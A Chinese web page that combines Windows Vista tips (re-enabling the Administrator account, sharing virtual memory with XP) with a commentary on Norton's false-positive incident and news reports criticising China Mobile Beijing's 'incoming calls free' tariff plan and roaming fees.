　 在默认的状态下，微软Vista操作系统已经把“Administrator”(超级系统管理员)帐户关闭。虽然用户在安装Vista时使用的帐户也可能属于“Administrator”的组别，但系统中有些设置功能必须要求Administrator帐户才能做到。如果你想将Administrator帐户的选项重现于启动时的登录选择画面，可根据以下步骤进行设置：

　　1、在“开始”-->“运行”中输入“Control userpasswords2”指令(图1)。



图1 输入“Control userpasswords2”

　　2、在随后弹出的“用户帐户”对话框的“高级”标签页中，点击“高级”按钮(图2)。



图2 高级用户管理

　　3、进入“本地用户和组”设置界面，在左边窗口点击“用户”文件夹，然后在右边窗口用鼠标右击“Administrator”一项，并设置一个密码以便登录“超级系统管理员”时使用(图3)。



图3 设置密码

4、接着再次在“Administrator”一项上右击鼠标，选择“属性”，进入“Administrator属性”设置窗口。在“常规”标签页中将“帐户已禁用”一项前的打勾符号取消(图4)。



图4 取消“帐户已禁止”

　　5、最后，修改注册表文件中的相关设置项目。在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\处新建注册表项“SpecialAccounts”(图5)，再新建子项“UserList”，然后新建一个名为“Administrator”的DWORD(32位)值，将其数值改成“1”(图6)。



图5 修改相关设置



图6 修改参数

　　现在，你只要重新启动电脑，就会发现名为“Administrator”的超级用户终于又出现在Vista操作系统的登录选择画面上了!

在XP与Vista双系统中巧妙共享虚拟内存

作者： Vista之家

　　在上面我们已经讲了如何来使用vista的设置来实现虚拟内存的修改。但是deepblue老编居然忘记了一件事情就是如果是xp 和VISTA双系统怎么来出来呢? 如果是双系统分别安装在两个不同的盘中，那么XP和VISTA都会搜罗出一些空间来做为自己的虚拟内存，这样就给有限的磁盘空间带来了一些压力。但是我们同样可以通过共享虚拟内存实现XP和VISTA的和平共处。

　　下央一起来看看怎么解决这个问题的。

法很简单具体步骤如下：

　　(1)计算机-〉属性-〉-〉菜单栏“高级系统选项”。

　　(2)高级-〉性能-〉设置-〉高级。



系统设置

　　(3)选择虚拟内存-〉更改-〉取消自动管理所有驱动器的分页文件大小-〉选择驱动器-〉点击“无分页文件”-〉设置(看见没有就在上面阿)-〉将默认的Vista虚拟内存分页文件删除。

　　(4)再选择xP 所在虚拟内存分区(是c就选C，我反正是C)-〉自定义大小自己选择(一般在XP下大小为3072)-〉设置-〉然后就是一路确定。ok 共享设置完毕。

新京报评论:是否该痛打诺顿?

新京报评论:是否该痛打诺顿?

一度被认为是世界上杀毒软件第一品牌的诺顿,近日却犯下了低级错误.不但在一次病毒库的升级中“自摆乌龙”———错将操作系统文件当作病毒查杀,而其公司赛门铁克在此后的几天中拒不道歉,只字未提赔偿.赛门铁克公司用外企惯用的“非本土”手段处理危机公关,导致其出现了四面楚歌的局面,甚至有评论认为,最近国内厂商和用户们激烈的行为完全是快意恩仇般地“痛打落水狗”.

5月18日,最早发现诺顿产品“误杀”行为的一些用户开始寻求解决的方式,不过率先向媒体披露这一信息的却是国内某杀毒软件公司.

随后,国内三大反病毒公司均在第一时间发布了解决方案,并纷纷对此事发表言论.

上演了“皇帝不急太监急”的戏剧性一幕.“国内厂商此举无异于乘人之危,落井下石,”某业内人士这样评价几家国内厂商的行为.有人据此怀疑,此次事件由于错误过于“低级”,甚至有可能是某竞争对手利用商业间谍潜入赛门铁克公司的“作乱”之举.

而赛门铁克处理此事的做法也确实授人以柄.在事件发生后,没有马上回应.23日下午2点该公司首次就此事召开媒体见面会,仍然拒绝谈论赔偿问题,只是反复表示,对事件发生“表示遗憾”.这更激怒了很多人.“落水狗”该不该打?七十年前鲁迅先生认为应该;如今一直把赛门铁克视为“眼中钉”的国内几大反病毒公司也认为应该,很多发泄无门的用户及好事者们更是认为还应该打得它永无翻身之日.从赛门铁克处理此事时同某些外企一样的傲慢态度来看,我们有理由对其予以指责,但却不应该不问事由乱打一气.

实际上,由于外企软件公司在中国市场长期实行公关代理制度,遇到危机事件反应速度远远跟不上节奏.在赛门铁克总部还在讨论对此事件的解决办法之时,网上有关此事的讨论正如火如荼,业内专家、法律人士、竞争对手和用户们的访谈,网上数据调查也此起彼伏.

“杀毒软件不杀毒,反杀用户系统文件”的做法一直被认为是行业大忌,但此前国内几家反病毒公司没有人敢说自己从来没有发生过类似事件,只不过事件发生后在本土化公关的优势之下迅速化解为无形,所以才未能引起轩然大波.业内一直传言杀毒行业监守自盗的事件屡见不鲜,反病毒公司自做病毒的说法也一度甚嚣尘上.在没有掌握确切证据的情况下,我们不可能随意抨击任何公司,但是一些公司痛打犯错的竞争对手的做法也值得商榷.

傲慢的、反应缓慢的赛门铁克公司经此一事注定会付出“失掉口碑”的惨重代价,或许产品从此滞销也是可能之事.这样的结果是很多人所希望看到的,但却不是我们这个鼓励竞争的时代所应该有的.一些公司在暗自窃喜之余,是不是也能修正一下自己的“非国际化”行为?

全球通被叫免费被指仍是套餐 移动被叫全免计划存在做秀嫌疑

被叫全免并非单向收费 引起用户质疑

出处： 人民网-人民日报

然而，来自中国移动的消息声称，“被叫全免”服务并非单向收费。一些用户和专家对“被叫全免计划”的优惠程度等提出质疑。

　　5月23日是北京移动公司正式推出全球通标准资费“被叫全免计划”的第一天。按照该计划，全球通标准客户在申请之后，每月的基本费仍为50元，此外仅计算呼出电话的费用。因此，这一计划被看作是北京地区全球通客户实行单向收费的一次突破。

　　然而，来自中国移动的消息声称，“被叫全免”服务并非单向收费。一些用户和专家对“被叫全免计划”的优惠程度等提出质疑。

　　“被叫全免”与“畅听套餐”，哪个更便宜？

　　23日下午4时20分，记者来到北京移动通信光华路营业厅。在采访的1小时里，一共有25人前来办理全球通“被叫全免”服务。领表处不时有人询问免费套餐的资费标准和办理程序。

　　尹先生是一家报社的退休职工。他说，自己手机平时话费并不多，主叫打不了280分钟，使用“畅听99元套餐”，并不合适。现在办理了“被叫免费”，可以省下一些钱。不过几十块钱的话费里还有50元的月租，这钱花得有点冤。

　　同样在办理业务的崔先生是一位投资顾问，他刚退了99元的套餐，转而办理“被叫全免”服务。“主要是电话不太多。如果电话多，‘被叫全免’还不如套餐合算。”

　　新华保险北京分公司的理财顾问朱万惠女士说，原来办理过139元打560分钟的“畅听套餐”业务，但还是不够用。“在网上看到消息，就赶快来办理‘被叫全免’。以后就用小灵通往外拨，用手机接。这样省钱。”

　　北京移动公关部的工作人员罗玲介绍，今年年初，移动公司推出了全球通“畅听套餐”业务，后来又推出动感地带、神州行免费方案。这次推出的“被叫全免”服务是一种新产品。北京移动有用户1000多万，一种服务不见得适合所有人，“究竟适合哪些人，用户自己可以根据通话情况来把握”。

　　北京移动全球通“被叫全免计划”的基本费用为50元月租，主叫每分钟4角，被叫本地不收钱。据了解，这项服务最适合每月话务量特别是外拨电话需求量小的机主，例如坐办公室的上班族。而对于那些每月话费较多或是经常外出的外勤人员，则不适合使用这项服务。

　　通过比较全球通“被叫全免”服务和“商旅68”服务，可以计算出：只有每天主叫少于1.5分钟的用户，才适合办理“被叫全免”。

　　因为，如果一位采用“被叫全免”的用户，一天的主叫为1.5分钟，也就是每月45分钟，那么按照0.4元／分计费，其花费应为18元，加上月租费50元，共68元。如果使用全球通“商旅68”服务，他同样花68元，不仅可以主叫170分钟、本地接听免费，还可以享受全国范围内拨打、本地外接听0.4元／分钟的优惠。而且，“商旅68”服务可通过短信开通服务。

　　在与光华路营业厅相距不到2公里的住邦2000营业厅，设置了专门办理“被叫全免”业务的窗口。办理的人排起了队。中国移动一位负责人介绍，整体办理情况如何，需要等一个星期后才有统计数字。“接听免费是否得到大家认同，最终要靠市场检验。”

　　申请“被叫全免计划”，用户害怕被“套牢”

　　要申请“被叫全免计划”，全球通用户需要到中国移动北京公司的各营业厅柜台办理。记者采访中发现，不少用户对这一点颇有微词。

　　在一家公司任职的彭先生抱怨说，“原来选用的是畅听套餐，打个电话或者发个短信就能办理。现在为了省一点钱，要跑到营业厅排半天队，有点麻烦。”

　　还有些人则说，对那些以前没有选用其他套餐的全球通用户，运营商为什么不能自动将它们转为“被叫全免”服务呢？

　　罗玲解释说，“被叫全免”是一项刚推出的业务，在办理方法上采用新的流程，需要一定的时间准备。他们以后还会陆续推出其他办理办法，方便用户办理。据了解，北京移动此前推出的套餐，也是陆续推出不同的办理方式的。

　　办理“被叫全免”服务，用户需要签订一份“全球通被叫全免计划”业务协议。协议规定，申请全球通“被叫全免计划”有效期为一年，有效期内不得转户、申请销号，还不得参加北京移动推出的其他优惠促销。此外，协议还规定：如中止协议，需提前10个工作日提出书面申请，经移动公司同意后方可。

　　一位全球通用户在接受采访时说，这其实就是要“套牢”用户。“如果一年时间内，北京移动再推出其他更加优惠的服务，我不就无权享受了吗？”

　　面对用户害怕“套牢”的担心，北京移动的一位负责人回应说，如果客户有取消服务的需求，可以按照规定与当地营业厅协商解决。

　　不叫“套餐”的套餐？

　　“全球通‘被叫全免’业务是在糊弄消费者。”北京邮电大学阚凯力教授直截了当地说。

　　他认为，不取消每月50元的月租费，并以此为前提搞所谓“单向收费”，本身就不合理。因为用户不打电话根本不占网络，不产生任何成本，也就不存在月租一说。而且，办理“被叫全免”还要附加一年在网以及亲自到营业厅办理的限制，这就给消费者设置了一道道“门槛”。

　　据了解，真正的单向收费是一种标准资费，无须用户办理，不附加限制条件。如此看来，到营业厅办理、承诺在网一年的“被叫全免计划”，并非真正意义的单向收费。

　　“‘被叫全免’就是不叫‘套餐’的套餐。”阚凯力进一步说，“这样的收费方式较之现有的套餐，也是一种倒退。”比如，与“神州行”相比，“神州行”无月租，每月10元钱就可单向收费，而“全球通”看似不交钱的单向收费，却实际比交钱的“神州行”还多出40元固定费用。

　　“消费者希望的是实实在在的降价，而不是变相的套餐。”阚凯力说，问题的关键还是要引入竞争，比如取消漫游费，让相对便宜的外地卡也可进京。“引进竞争，才能真正降低手机用户的费用。”

全球通被叫免费被指仍是套餐

出处： 北京日报 作者： 刘宇鑫

有老用户等待7月带号转为资费更低的神州行或动感地带

　　从昨天开始，北京移动为全球通用户开办“被叫全免计划”业务，希望借此让用户得到单向收费的实惠，而不用再靠吃“套餐”实现免费接听。消息一出，全球通客户们对这一业务褒贬不一。有精明的全球通用户认为“被叫全免计划”是北京移动要用“一年在网”的承诺，“拖住”用户错过7月1日带号转品牌的机会，在网上提议等待带号转为资费更低的神州行和动感地带品牌。

　　-全球通用户拨弄“小算盘”

　　最实惠就等七月带号转品牌

　　要办理“被叫全免计划”的用户必须先到北京移动的营业厅签一份“在网一年”的合同，合同有效期内，不得转户、销号，不得参加北京全球通其他优惠活动;如果用户在合同有效期的最后一个月内不提出异议，协议将自动延期一年。

　　昨天，网上出现全球通用户的“盘算”:北京移动至少是要先“套”住自己每月50元的月基本费，一“套”就是12个月。而电信企业年初公开表示过，今年7月1日开始用户可以带号转品牌。同样是“本地被叫全免费”，与其被拴上一年的月租费，不如再用两个月的“畅听99”套餐，等到7月1日后就带号转品牌，使用原有的全球通号码享受到动感地带或神州行的资费优惠。

　　今年7月1日起，北京移动按照信产部的要求，将实现全球通用户与动感地带、神州行畅听卡之间携号互转。此前，北京移动已经实现了动感地带和神州行畅听卡之间的品牌互转。

　　有业内人士表示，对于全球通的“被叫全免”，神州行现在就有20元在北京免费接听的“打听计划”，动感地带也有20元的“动听计划”，因此全球通的“被叫全免计划”每月50元的月租和全价的主叫费用，相对于中国移动其他品牌仍然贵了不少。

　　-转“单向”耗时费事

　　老产品不忘挖墙脚

　　记者昨天下午在中国移动西单营业厅看到，等待办理业务的排队号码已经排到100号。“今天来办业务的人比平时多了不少。”门口的保安说。

　　办理“被叫全免计划”，并不像以往申请套餐，用户既可以选择到营业厅办理，也可以简单地发送手机短信就能搞定，而是用户必须到中国移动北京公司的各营业厅亲自办理。“这是因为全球通手机用户需要与公司签订在网协议。”北京移动工作人员这样解释。

　　不过记者看到，有冲着“被叫全免计划”来的用户，经过咨询又改了主意:“‘被叫全免计划’不值，”对顾客的询问，移动营业厅咨询台的工作人员直截了当地介绍，“接电话是不花钱了，50元的基本月租费不是还要照交嘛。您还不如办个月最低消费68元的‘畅游08商旅计划’套餐。”据了解，上个月推出的“畅游08商旅计划”最大的特点是“无月租;北京本地接听不花钱;无漫游费，无长途费;全国通话都是市话价，国内通话费不超过0.4元/分钟。”听完工作人员的介绍，一些原本打算办理“被叫全免计划”业务的用户，都拿起“畅游08商旅计划”仔细阅读。

　　记者也听到有用户表示不称心:“全免计划可能是不错，但被叫全免还是换汤不换药。”老全球通用户孟先生说，尽管实现了本地来电的免费接听，“被叫全免计划”却没能取消手机用户的其他有争议的收费:基本月租费、漫游费一个不少。“什么时候把实惠给用户给得彻底点儿?”

经济半小时：移动被叫全免计划存在做秀嫌疑

CCTV《经济半小时》



图：移动营业厅里办理和了解被叫全免业务的顾客。



　　图：记者在营业厅外面，展开了一个小型的问卷调查。经过统计，在接受调查的20个人中，有17个人对目前移动手机资费情况并不满意，占到了调查总人数的85%。

　　中国移动北京分公司发布消息，从今天开始，正式推出全球通“被叫全免计划”，即手机单向收费，这一举措是否就意味着北京地区的全球通客户将迎来真正意义的单向收费服务呢？手机用户会从中得到多少实惠？本栏目记者李想在北京的几家中国移动营业部进行了调查。

　　“被加全免计划”经不起用户推敲

　　5月23日起，中国移动北京公司推出了全球通。记者一早来到中国移动北京西单营业厅刚才营业厅进行调查采访，营业部的工作人员告诉记者，要想享受“被叫全免计划”，用户需要到营业厅来办理，从下月开始用户就可以享受到本地接听免费业务。并且没有任何套餐、没有任何费用，没有时间上的限制。记者看到在营业厅里很多的顾客都是前来办理和了解被叫全免业务的。

　　顾客：“是来了解这个计划的。”

　　顾客：“我就是来办的。”

　　记者：“是吧？你觉得这个计划怎么样？”

　　顾客：“挺好的。”

　　由于本地接听电话全部免费，仅收取拨打电话的费用。不需要选择套餐，资费简单清晰、一目了然，的确让不少渴望降低手机资费的用户对北京移动的新政策产生了兴趣。

　　顾客：“刚办完。”

　　记者：“刚办完是吧？您对这个计划怎么看呢？”

　　顾客：“可以理解是单项收费吧。”

　　记者：“是不是，您觉得挺好的？”

　　顾客：“我觉得挺不错，非常好，盼望好长时间了，终于可以便宜点了。”



　　图：北京打工者小赵查看使用了优惠套餐之后，仍月月超额的话费清单。



　　图：一直为公司办理集体订购套餐业务的郑女士告诉记者，在选择了优惠套餐之后，公司的话费也并没有明显的下降。

　　采访中，一位姓苏的小姐从朋友那里听说了全球通“被叫全免计划”，也来到了北京西单营业厅准备办理。

　　中国移动营业员：“您每月50元钱，每月正常收费，月租费承诺(在网)一年，可以享受这个接听全免。”

　　了解了详情以后，苏小姐却改变了办理的计划。因为根据营业员的介绍，按照此次全球通“被叫全免计划”，用户在申请以后，虽然本地接听电话全部免费，但每月必须缴纳50元的基本月租费，而本地主叫也按标准资费收取0.4元/分钟，不享受任何套餐优惠。

　　苏小姐：“不打算办，还是觉得用我套餐比较划算，如果我办了这个业务的话，套餐还得取消，我觉得太划不来了。”

　　苏小姐告诉记者，来办理“被叫全免计划”，本以为可以让每月省下一笔手机话费，但算了一笔账以后，她发现不带套餐的‘单向计划’并不意味着便宜。

　　苏小姐：“我现在使用的是(全球通畅听)99套餐，它是99元最低档的(消费)，280分钟呼叫时间就是送你，你算一下啊，这个(“被叫全免计划”)每分钟4角钱，如果算下来280分钟，再加上月租费50元，就是162元钱，远远超过我的套餐。”

　　而且对于移动公司要求用户要到营业厅来办理，以及还需要承诺在网一年等条件，苏小姐也颇有微词。

　　苏小姐：“如果它降价的话，可以直接给用户提供这种服务，不需要来营业厅办理啊。”

　　在采访中，记者发现和苏小姐有着同样想法的用户还并不少。

　　顾客：“我觉得这个东西就是反正买的没有卖的多，他肯定还要考虑一部分，我觉得最大的议论，有些比例像我这样的，这种偶然性存在的比例也还是有，我愿意活该多掏这50块钱，他可能觉得这种比例还是有的。”

　　采访中，一些用户告诉记者，所谓“被叫全免计划”，最适合基本不打电话，以接听电话和收发短信为主的用户，而对于每个月的主叫时间超过122分钟的用户，“被叫全免计划”绝不是理想的选择。但是记者算了算，每个月主叫不超过122分钟的话，那么平均到每一天才仅4分钟的通话时间。

　　顾客：“我觉得没什么，神州行不10元钱也可以吗。”

　　在北京，像神州行，每月花费10元钱，便可以享受到500分钟的免费接听服务，所以每月高达50元的月租的确把很多希望彻底享受单项收费服务的用户挡在了门外。

　　记者在营业厅外面，展开了一个小型的问卷调查。经过统计，在接受调查的20个人中，有17个人对目前移动手机资费情况并不满意，占到了调查总人数的85%。其中手机单位时间资费偏高、月租费、漫游费和双向收费不合理是用户反映最多的四个问题。尤其是漫游费，在20个接受调查的用户中，有15个人都认为漫游费过高，占到了75%。其中当要求接受调查的用户填写一项认为最不合理的收费项目时，又有12个人都提到了漫游费用太高，占到了60%，也超过了半数。



　　图：北京邮电大学无线新技术研究所副教授 纪阳，认为从技术层面来看，手机在漫游通话时，无需进行额外的数据传输，但电信运营商却无视这一事实，照样按分钟收取漫游费。



　　图：北京移动推出的林林总总的“优惠套餐”。

　　漫游费成本仅占运营商收取费用的几百分之一

　　从记者刚才的实地调查看，被叫全免计划能让用户得到的实惠还是十分有限，它与中国移动之前推出的各项优惠套餐相比，似乎没有明显的差别。

　　通过问卷调查可以发现，大多数用户对中国移动目前所采取的收费政策也并不满意，他们认为收费高，也最不合理的一项，就是漫游费。手机漫游费用到底该收不该收取呢？

　　北京邮电大学无线新技术研究所副教授 纪阳：“现在中国目前漫游费的资费还是偏高的，应该降，甚至降大零，可以把它降到零。”

　　纪阳，北京邮电大学无线新技术研究所副教授。他告诉记者，手机实现漫游并不需要很高的技术，运营商提供这样的服务，成本也非常地低廉。因此他建议降低甚至取消漫游收费。

　　纪阳：“假定我们的北京有一个用户，他漫游到杭州，杭州呢会有一个VLR，VLR的意思呢是拜访位置，它能够检测到现在有一个用户来了，并且看出来这不是杭州用户，是一个北京用户。这个用户一些相关的数据要从北京局的HLR拷贝到VLR。”

　　纪阳介绍说，只要杭州的电信运营商和北京的电信运营商完成了该用户的数据信息交换，该用户的手机就可以实现漫游。而信息交换所需要传输的数据量非常小，所需要的时间还不到一秒。

　　纪阳：“就是一千个bytes(字节)之内，绝对能够把这些消息传送到，这个量也不是很大，这个费用不会很高。”

　　字节是衡量文件大小的一个单位，那么1000个字节的文件究竟有多大呢？可以做一个比较：一位北京的手机用户用手机通话一秒钟，传输的数据信息如果用字节来衡量的话是8000字节，而一分钟就是480000字节(48万)，北京电信运营商的收费标准是0.40元。如果根据这一标准，漫游时所传输的1000个字节的信息的收费应该不到人民币一厘钱，仅仅是现在电信运营商漫游收费的几百分之一。

　　纪阳：“我认为它的价值，它成本消耗确实很小。”

　　数据传输的量如此之小，但收费却如此之高，让从事技术工作的纪阳很难理解。但他更难理解的是，电信运营商的重复收费。

　　纪阳：“这部分建立链路结束，然后大家就可以开始打电话了，打电话你是打一个小时，你是打十分钟，你是打五分钟，他都是要给你收漫游费的，但是它付出的成本充其量就是这么多信息。”

　　纪阳告诉记者，当1000个字节的信息交换完成之后，北京的手机用户就可以在杭州漫游了，从技术层面来看，这时他的手机和杭州本地的手机已经没有任何区别，在漫游通话时，也无需进行额外的数据传输，但电信运营商却无视这一事实，照样按分钟收取漫游费。

　　纪阳：“它不应该随着我打电话的时间长度的累计而增加，它就应该是一次性的消费，就是比如说我们一次漫游呼叫定成一块钱，定死了就一次，且不说它一块钱高还是低，你就应该每次漫游，漫游打一次电话就收一次费用，不要再随着我通话时间长度累计而累计，对吧。”

　　纪阳告诉记者，正是因为手机漫游的成本很低，所以欧洲、美国、日本这些地区都不收漫游费，但在中国，不合理的漫游费用却长时间存在，始终没有改变。

　　纪阳：“漫游费两个问题，第一个问题就是说你不应该按照时间长度来收费，首先把这个取消掉了，第二个问题是不是应该就是说从成本角度来讲，尤其从交换机之间，或者说交换数据这个成本来讲并不太高，这个应该把它降下去。”

　　2006年，中国移动集团税前盈利968亿元，同比增长23%；运营收入2853亿元，同比增21%，用户总数达3.18亿户，同比增长20%；每月每户平均收入81.6元。2006年，上市公司中国联通的全年税前利润84.4亿元，同比增长29.4%；主营业务收入达804.8亿元，比上年增长5.7%。用户总数达1.42亿户，同比增长近10%。

　　北京邮电大学信息产业政策与发展研究所的阚凯力教授：“像有的移动通信企业，像去年一年就赚六、七百亿的税后净利，这个税后的净利润呢，利润率能达到百分之二十几。这个在全世界就闻所未闻的。”

　　记者：“全世界的一个通行的那个规定，应该是多少利润？”

　　阚凯力教授：“全世界，一般的总的来讲，超过10%的净利润很少，像美国最大的移动通信企业，利润率不过才1%。所以在我们国家，能达到百分之二十几，可以说在国际上也是一个很不正常的现象。”

　　“优惠套餐”实为电信运营商“打包出售”的套钱工具

　　通过专家的解释，相信每个手机用户都会难以致信，原来动不动收几十元上百元的手机漫游费，运营商实际成本还不到一厘钱，难怪国内的移动运营商能获得远远高于国际水准的利润率，也难怪中国移动北京分公司推出被叫全免计划之后，大部分被调查用户依然认为资费过高。

　　实际上，被叫全免之前，中国移动就已经在各地推出过大量优惠套餐，并且宣称，只要适用了套餐，就会大大降低手机资费。那么，实际情况真的如此吗？

　　在中国移动中关村营业厅，一位马大爷告诉记者，多年来他一直是中国移动全球通的用户，为了降低资费，每当中国移动推出新的优惠套餐，他都会参加，但这次中国移动北京分公司推出的“被叫全面计划”他却没有选择，原因是他认为这项新套餐并不能带来多大的优惠。

　　马大爷：“他说那个50块钱月租，打1分钟4毛钱，就是接可能是不收费了，我说取消月租费有没有，他说没取消，没取消我就不用了。”

　　和马大爷有着同样疑惑的还有一直在北京做生意的老张，他告诉记者，这几年，他换了不少全球通的优惠套餐，但不仅麻烦，用起来也并不怎么省钱。

　　老张：“最起码加拨好多号12593啊，或加拨好多号，你才能打一个便宜的电话，你不加或忘加这个号码就会6角钱，这还是以前的标准，希望以后就不要加这些号，打电话就便宜就得多了。”

　　而来北京打工的小赵则直接向记者出示了他刚打出的话费清单，他告诉记者，虽然自己用的是每月仅收一百三十元的优惠套餐，但却月月超额，以至于他对所选的优惠套餐产生了怀疑。

　　记者：“你为什么打这个单子？”

　　小赵：“这些账目有些不是很清楚，打出来看一下子

　　记者：“你觉得对他这个不满意的在那些地方。”

　　小赵：“老改来改去，没谱。”

　　套餐还是套钱？一直为公司办理集体订购套餐业务的郑女士接收了记者的采访。她告诉记者，公司每年的通信费用都由她来预算实施。为了尽可能降低公司话费支出，她反复比较了中国移动的各种优惠套餐。

　　郑女士：“主要是在选择的时候，套餐非常多，有很多是主动上门来，跟我们介绍这个套餐的在介绍过程当中，我们会发觉开始选择的时候，因为我们毕竟不专业，在选的时候看到这么多，一开始觉得非常好，就替经常出差的同事选一种，替不经常出差的选一种，感觉是比较合适的。”

　　在经过烦琐的选择之后，郑女士终于为公司员工选定了中国移动的十几种套餐，然而在集体订阅套餐仅仅一个月后，各种优惠套餐的问题就显现了出来。

　　郑女士：“当月产生话费之后，就很快看到清单以后，超出了我们的预支。”

　　记者：“那你觉得这里边，还有没有其他的什么问题？”

　　郑女士：“我觉得问题在于，他这个每一个套餐都很难得，会全面的包含个性化需求

　　而且经常出差的人，只想到了比如他话费可能必较多，因为联系电话比较多，出差的做业务的人，但是没有想到出差之后，他们的漫游费是单算的，然后长途话费也是单算的。”

　　不仅如此，郑女士告诉记者，在选择了优惠套餐之后，公司的话费也并没有明显的下降，在她自己的话费单子上，不少收费让她感到莫名其妙，既使是咨询了移动公司，但她还是搞不明白。

　　郑女士：“这个费用反正也比较少，也不知道是什么费用，研究他们这个专业名词，反正一般也没有时间去研究，比较专业的而且好像还有变化，这回这么叫，下回不那么叫了，叫人很难理解。”

　　在郑女士看来，套餐其实就是对本地通话、长途通话、增值业务、上网流量等内容的“打包出售”。管你需要不需要，管你看懂看不懂，都让你花钱没商量。



　　图：北京邮电大学信息产业政策与发展研究所教授 阚凯力：“我觉得北京移动这么高调的来推出所谓的单向收费计划，实际上他还是一个套餐，只不过改名叫做计划，而且比现有的那些接听免费的这种套餐是大大的退步，所以我觉得这种做法完全是做秀。”

　　被叫免费计划存在“做秀”嫌疑

　　看来，中国移动北京分公司今天推出的被叫全免计划，并没有得到用户的认可，而此前名目繁多、林林总总的优惠套餐，也没有得到用户的好评。对中国移动的一番苦心，用户们为什么总是不买账，资费问题的症结究竟在哪里？

　　对于中国移动北京分公司推出的全球通单向收费服务，北京邮电大学信息产业政策与发展研究所的阚凯力教授并不认同。

　　北京邮电大学信息产业政策与发展研究所教授 阚凯力：“我觉得北京移动这么高调的来推出所谓的单向收费计划，实际上他还是一个套餐，只不过改名叫做计划，而且比现有的那些接听免费的这种套餐是大大的退步，所以我觉得这种做法完全是做秀。”

　　阚凯力从两个方面进行分析，对北京移动推出的单向收费提出了质疑。首先，他认为，既然是单向收费，50元钱的月租费的收取是完全没有道理的。

　　阚凯力：“因为我一个手机的用户，我只要不打电话，根本就没有占用我这个移动的网络，所以就不造成任何成本，这50元的月租费，在以前的种种套餐里面，实际上已经都免掉，但是这次所谓的单向收费实际上就是接听免费了，还50元的月租为前提，这个本身就是非常不合理的。”

　　除了50元的月租费，北京的全球通客户还要承诺在网一年，才可享受本地接听电话全部免费，对此，阚凯力指出了其不合理性。

　　阚凯力：“同时还加了其他的附加条款，尤其严重的就是必须保证一年在网，这个附加条款实际上就是要把消费者锁定，靠牢，这种做法更是违背信息产业部的相关的精神和明确的指示，都是不得附加这种额外的条件。”

　　阚凯力认为，公众之所以呼吁手机单向收费，其背后实际是要求移动通话费下降。目前北京的手机费相对于全国其他城市还是高出不少，究其原因就在于北京的移动通信市场处于垄断地位，缺乏足够的市场竞争。

　　阚凯力：“为什么我们北京和外地会有这么高的差别，关键就在于在北京没有足够有效的竞争，只有两家，一个北京移动，一个北京联通，两家商量好了来共同，就是向北京的消费者谋取它的超额利润。”

　　阚凯力提出，解决咨费过高问题的有效办法是取消漫游费，使外地卡能够进入北京，从而与北京的运营商形成竞争，只有在巨大的竞争冲击下，北京手机用户的高资费最终才能得以下降。

　　阚凯力：“只要一旦把漫游费取消了，北京的高资费的市场，就失去了它的关税保护的壁垒，竞争充分，外地卡进京了，这样就使北京的高自费会有一个实质性的下降。这样的话，我们消费者降低手机资费，保护自己权益的这个目标还可以有效的实现。”

　　半小时观察：资费透明才是核心

　　手机单向收费似乎是消费者多年的希望，社会各界也为此争论了多年。可真当我们的脚迈过这道门槛的时候，却发现收费是单向还是双向，原来并不重要，重要的是手机资费到底有没有实质性下降？用户究竟得到了多少实质性实惠？因为，收费多少只是形式，资费透明才是核心。

　　我们仔细剖析就会发现，在目前的手机资费中，不合理的地方还有不少，除了漫游费，还有月租费、停机保号费等等，左一项、右一项，加到一起在每个月的手机费里能占到不小的份额。所以，尽管现在移动运营商价格大战，打的不亦乐乎，除了个别地方，各地早已全面突破了信息产业部的资费标准，所谓单向收费也已经暗地里成为事实，但运营商还能获得远高于国际水平的巨额利润。这一切充分说明，和运营商的实际成本相比，手机资费还含有很大水份，完全有较大的下调空间。

　　有人把被叫全免计划称为“迟来的爱”，那这份爱心到底有多少内容？等到交下个月手机费的时候，就能知道。

　　主编：周人杰

　　记者：彭伟玮 李想 郎丽娜 井天增 刘春华

　　摄像：李培 李慧 刘勋 毛云李 叶永森

　　文稿编辑：刘莹

　　注：本文为《经济半小时》5月23日播出节目文稿。

新华社:手机单向收费也要打假 其实只是套餐

*所谓的套餐简直就是餐馆的“最低消费”,只是这多如牛毛的选择已经让用户们迷惘不已,而忽视了这一游戏规则本身的不公平.

*简简单单的单向收费为何搞得如此复杂?我想,行业的高额利润令运营商们难以割舍恐怕是问题背后的实质.

*单向收费也有个真假问题,由此,相应的打假工作仍旧任重道远.

2月1日,一则消息让众多手机用户欣喜有加:手机单向收费终于摘下面纱了.闻听这个消息,我颇为兴奋地马上在网上搜索这一新闻,然而找到后越看越觉得愤懑,这是什么单向收费?热衷于数字游戏的运营商们对此乐此不疲,而忽悠了用户们多年的单向收费仍然是“犹抱琵琶半遮面”.

　　我们首先看看北京移动的所谓单向套餐:

　　“畅听99”套餐分为99元、139元、199元和299元四档,分别包含280分钟、560分钟、1000分钟和2000分钟的本地主叫电话,以套餐内的通话时长折算,四档套餐内的主叫单价分别为0.35元/分钟、0.25元/分钟、0.2元/分钟和0.15元/分钟.当用户主叫通话时长超出套餐包含时间后,其主叫资费也将按照套餐内的价格收取,且不分忙闲时.本地接听则不区分套餐内和套餐外,均为完全免费.

　　首先,所谓的套餐简直就是餐馆的“最低消费”,只是这多如牛毛的选择已经让用户们迷惘不已,而忽视了这一游戏规则本身的不公平.我们去餐馆消费,订了一个包间,服务员告诉我们今天这个包间最低消费300元,我们肯定会大声抗议.那么这99、139、199和299元的套餐我们有选择的余地吗?要单向收费可以,你只能选上一个,而且这一条款你连抗议也无处抗议,这比“霸王条款”还“霸道”.与餐馆的“最低消费”相区别的是,在餐馆里觉得不合适我们可以换一家,而觉得套餐不合适,我们几乎连换的余地也没有.

　　在单向收费的问题上,显然缺乏一个用户向运营商表达意见的渠道.无论怎样的资费调整,从来都是运营商一个人的游戏,而这些“格式条款”式的套餐也只是强大的运营商在用户们的呼声下进行的调剂罢了.

　　其次,这一所谓的单向套餐也仅仅只是在窄小的范围内实施.在北京移动的这一套餐名单上,仅仅针对的是全球通用户而已,众多的神州行和动感地带用户等并不在这一套餐的享用范围序列.

　　而且,这一套餐也仅仅是本地被叫免费而已,“单向收费”只是一种忽悠式的炒作.春节即将来临,对于那些将要从外地回家的人以及想出去旅游的人来说,所谓的"单向收费"春风是吹不到身上的,只能在外地接打电话时支出高额的漫游费用.而对那些要常常打外地长途的用户来说,要想享受主叫优惠也只是镜花水月而已.

